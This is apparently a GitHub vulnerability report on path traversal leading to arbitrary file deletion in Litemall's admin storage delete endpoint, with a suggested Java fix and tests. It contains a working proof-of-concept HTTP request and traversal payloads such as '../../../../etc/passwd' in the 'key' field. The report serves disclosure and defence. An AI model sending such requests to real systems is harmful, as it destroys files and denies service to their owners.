Arbitrary File Deletion Vulnerability in /admin/storage/delete #564

@ez-lbz

Description

Summary

An arbitrary file deletion vulnerability exists in the Litemall system at the /admin/storage/delete endpoint. Because user-provided input is not sufficiently validated, an authenticated user holding the delete permission can craft a request that removes any file the application process can write to, including critical system files. The risk is high: the flaw can directly cause denial of service or serve as a step toward further compromise of the system.

Details

The vulnerability is rooted in the following code path:

```java
@RequiresPermissions("admin:storage:delete")
@RequiresPermissionsDesc(menu = {"系统管理", "对象存储"}, button = "删除")
@PostMapping("/delete")
public Object delete(@RequestBody LitemallStorage litemallStorage) {
    String key = litemallStorage.getKey();   // user-controlled, taken straight from the JSON body
    if (StringUtils.isEmpty(key)) {
        return ResponseUtil.badArgument();
    }
    litemallStorageService.deleteByKey(key); // removes the database record
    storageService.delete(key);              // <-- sink: key reaches the file system unvalidated
    return ResponseUtil.ok();
}
```

The key parameter, which is user-controlled, is passed without any check to the storage implementation:

```java
@Override
public void delete(String filename) {
    Path file = load(filename);   // resolves the caller-supplied name against the storage root
    try {
        Files.delete(file);       // deletes whatever the resolved path points to
    } catch (IOException e) {
        logger.error(e.getMessage(), e);
    }
}
```

Because key is neither sanitized nor restricted to the storage directory, an attacker can supply an arbitrary path (e.g., ../../../../etc/passwd), and the resolved path escapes the intended root, resulting in deletion of arbitrary system files.

POC

  • Tested on Windows. The request below deletes C:\Users\86138\Desktop\a.class, a file well outside the storage directory:

```http
POST /admin/storage/delete HTTP/1.1
Host: localhost:8080
Cookie: Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1753431455,1753436446,1753450237; JSESSIONID=acdcb3c3-1eda-4407-9691-000f90d200f5; X-Litemall-Admin-Token=acdcb3c3-1eda-4407-9691-000f90d200f5
sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138"
Origin: http://localhost:9527
Sec-Fetch-Site: same-site
Accept-Encoding: gzip, deflate, br, zstd
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Sec-Fetch-Dest: empty
Referer: http://localhost:9527/
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
X-Litemall-Admin-Token: acdcb3c3-1eda-4407-9691-000f90d200f5
sec-ch-ua-mobile: ?0
Sec-Fetch-Mode: cors
Accept: application/json, text/plain, */*
sec-ch-ua-platform: "Windows"
Content-Length: 227

{"id":1,"key":"C:\\Users\\86138\\Desktop\\a.class","name":"2.jpg","type":"image/jpeg","size":3781,"url":"http://localhost:8080/wx/storage/fetch/6fq5na4x56qvqpfm6niy.jpg","addTime":"2025-07-28 09:27:12","updateTime":"2025-07-28 09:27:12"}
```

Exploitation Scenario

  1. The attacker crafts a request whose key value is a traversal or absolute path, such as ../../../important/system/file.

  2. The backend resolves this path and calls Files.delete() on it, deleting whatever file it names.

  3. This can be used to delete application resources, configuration files, logs, or even critical OS files, potentially leading to denial of service or further privilege escalation.

Impact

  • High-risk: Attackers with valid credentials but low privilege can delete arbitrary system files.

  • Can lead to denial of service, loss of critical system data, and may enable further exploitation.

Root Cause

The root cause is trusting a user-supplied file path without validating or canonicalizing it. There is no allowlist for the shape of a storage key, and no check that the resolved path still lies inside the storage root, so the key parameter directly enables path traversal and arbitrary deletion.
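The following is an added example, not Litemall's code, showing the two controls the Details and Root Cause sections say are missing: an allowlist on the key's shape (keys generated by the upload path look like 6fq5na4x56qvqpfm6niy.jpg, a single segment with no separators) and a canonicalized containment check against the storage root. The class name, the temporary root directory and the sample keys are assumptions for the demo.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.regex.Pattern;

public class SafeStorageDelete {
    // Hypothetical storage root; the real service reads its root from configuration.
    private final Path rootLocation;
    // Allowlist: one path segment, optional extension, no '/', '\\', ':' or "..".
    private static final Pattern KEY_SHAPE = Pattern.compile("[A-Za-z0-9_-]+(\\.[A-Za-z0-9]+)?");

    public SafeStorageDelete(Path rootLocation) {
        this.rootLocation = rootLocation.toAbsolutePath().normalize();
    }

    /** Returns the file the key refers to, or throws if the key is malformed or escapes the root. */
    public Path resolveKey(String key) {
        if (key == null || !KEY_SHAPE.matcher(key).matches()) {
            throw new IllegalArgumentException("invalid storage key");
        }
        // Defence in depth: canonicalise and require the result to stay inside the root.
        // resolve() returns an absolute argument unchanged, so "C:\\..." or "/etc/passwd"
        // would leave the root and be caught here even without the shape check.
        Path file = rootLocation.resolve(key).normalize();
        if (!file.startsWith(rootLocation) || file.equals(rootLocation)) {
            throw new IllegalArgumentException("key escapes storage root");
        }
        return file; // Files.delete does not follow symlinks, so a link inside the root only removes the link
    }

    public boolean delete(String key) throws IOException {
        return Files.deleteIfExists(resolveKey(key));
    }

    public static void main(String[] args) throws IOException {
        SafeStorageDelete storage = new SafeStorageDelete(Files.createTempDirectory("litemall-storage"));
        Files.createFile(storage.rootLocation.resolve("6fq5na4x56qvqpfm6niy.jpg"));
        System.out.println("in-root key deleted: " + storage.delete("6fq5na4x56qvqpfm6niy.jpg"));
        // Constructed hostile keys: traversal, absolute Windows path, nested path.
        for (String bad : new String[] {"../../../../etc/passwd", "C:\\Users\\86138\\Desktop\\a.class", "sub/x.jpg"}) {
            try {
                storage.delete(bad);
                System.out.println("UNEXPECTED: deleted " + bad);
            } catch (IllegalArgumentException e) {
                System.out.println("rejected " + bad + ": " + e.getMessage());
            }
        }
    }
}
```

Rejected keys are also a useful detection signal: logging the raw key and the admin identity on IllegalArgumentException flags attempts that the original endpoint would have executed silently.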
